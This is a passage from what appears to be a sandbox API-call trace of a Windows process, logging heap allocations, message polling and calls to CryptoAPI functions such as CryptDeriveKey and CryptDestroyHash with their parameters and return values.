dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0266.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0266.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0266.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51d78 [0266.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51d78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0266.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.982] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0266.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0266.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0266.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0266.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0266.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0266.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0266.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0266.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0266.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0266.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0266.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0266.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0266.983] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87610, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa872d0) returned 1 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0266.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0266.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0266.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0266.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0266.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f28 [0266.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f28 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0266.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0266.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0266.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0266.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0266.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0266.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0266.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0266.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0266.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0266.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0266.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0266.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0266.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0266.986] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.986] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0266.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0266.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.987] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e698c8 [0266.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0266.987] CryptDestroyHash (hHash=0xa87610) returned 1 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.989] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: 